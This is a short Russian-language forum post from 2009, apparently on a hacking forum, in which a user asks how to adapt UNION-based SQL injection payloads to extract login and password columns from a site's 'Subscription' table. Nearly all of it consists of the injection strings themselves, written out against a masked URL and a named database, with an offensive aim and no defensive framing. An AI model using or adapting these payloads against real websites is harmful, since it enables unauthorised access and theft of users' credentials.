28.04.2009, 19:10
|
|
Новичок
Регистрация: 27.04.2009
Сообщений: 10
С нами:
8968918
Репутация:
2
|
|
Сообщение от farex
table_name=Subscription - имя таблици где есть колонка "password"
db_name=dvb - имя бд в которой находится таблица "Subscription"
с колонкой "password"
 вот с этим не сопоставимо:http://xxx/news.php?id=-1' UNION SELECT 1,2,login,password,5,6 FROM Users LIMIT 1,1 -- видимо устаревает информация
Для вывода логина и пасс делаем:
-349+union+select+1,concat_ws(0x3a,login,password), 3,4,5,6,7,8,9+from+хекс(Subscription)+limit+1, 1
или же как-то подругому?
Для вывода логина и пасс имя БД нам необязательно? т.к. запросы все равно идут в пределах базы, к которой обращается скрипт.
|
|
|